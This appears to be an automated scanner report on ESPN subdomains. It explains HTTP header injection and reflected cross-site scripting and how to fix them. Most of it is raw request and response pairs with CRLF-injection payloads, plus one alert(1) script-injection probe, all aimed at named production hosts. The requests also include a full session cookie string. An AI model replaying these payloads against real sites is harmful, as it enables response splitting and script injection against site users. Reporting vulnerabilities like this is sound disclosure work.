HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload f3394%0d%0a260e20407d2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/f3394%0d%0a260e20407d2/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 201 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/f3394 260e20407d2/frontpage Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/f3394 260e20407d2/frontpage">/pokerpickem/en/f3394 260e20407d2/frontpage</A>.<BODY></HTML ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4ec69%0d%0a484c4d23469 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/4ec69%0d%0a484c4d23469/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/4ec69 484c4d23469/group Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/4ec69 484c4d23469/group">/pokerpickem/en/4ec69 484c4d23469/group</A>.<BODY></HTML>
The value of REST URL parameter 2 is copied into the Location response header. The payload a807e%0d%0a898e11a593d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/a807e%0d%0a898e11a593d/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/a807e 898e11a593d/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/a807e 898e11a593d/story">/pokerpickem/en/a807e 898e11a593d/story</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload db6fa%0d%0a57ddd8e895b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /db6fa%0d%0a57ddd8e895b HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 157 Content-Type: text/html; charset=iso-8859-1 Location: /en/db6fa 57ddd8e895b Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/db6fa 57ddd8e895b">/en/db6fa 57ddd8e895b</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be1%0d%0a5bb07d47379 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be1%0d%0a5bb07d47379/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 159 Content-Type: text/html; charset=iso-8859-1 Location: /en/31be1 5bb07d47379/ Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/31be1 5bb07d47379/">/en/31be1 5bb07d47379/</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 1babd%0d%0a818dc4039b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1babd%0d%0a818dc4039b8/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 183 Content-Type: text/html; charset=iso-8859-1 Location: /en/1babd 818dc4039b8/conversation Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/1babd 818dc4039b8/conversation">/en/1babd 818dc4039b8/conversation</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d6b6%0d%0a1e751f105f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d6b6%0d%0a1e751f105f3/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 197 Content-Type: text/html; charset=iso-8859-1 Location: /en/6d6b6 1e751f105f3/createOrUpdateEntry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/6d6b6 1e751f105f3/createOrUpdateEntry">/en/6d6b6 1e751f105f3/createOrUpdateEntry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 60040%0d%0a06f626c9e72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60040%0d%0a06f626c9e72/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 169 Content-Type: text/html; charset=iso-8859-1 Location: /en/60040 06f626c9e72/entry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/60040 06f626c9e72/entry">/en/60040 06f626c9e72/entry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 63b5f%0d%0acf2b0e791bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /63b5f%0d%0acf2b0e791bb/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 179 Content-Type: text/html; charset=iso-8859-1 Location: /en/63b5f cf2b0e791bb/entryStats Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/63b5f cf2b0e791bb/entryStats">/en/63b5f cf2b0e791bb/entryStats</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b78a%0d%0a54f670ab62 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b78a%0d%0a54f670ab62/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 167 Content-Type: text/html; charset=iso-8859-1 Location: /en/7b78a 54f670ab62/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/7b78a 54f670ab62/story">/en/7b78a 54f670ab62/story</A>.<BODY></HTML>
The value of the object_id request parameter is copied into the Location response header. The payload 3ca92%0d%0a5d6cccec3bc was submitted in the object_id parameter. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="/ci/content/submit/comm ...[SNIP]...
2. Cross-site scripting (reflected)previous There are 155 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
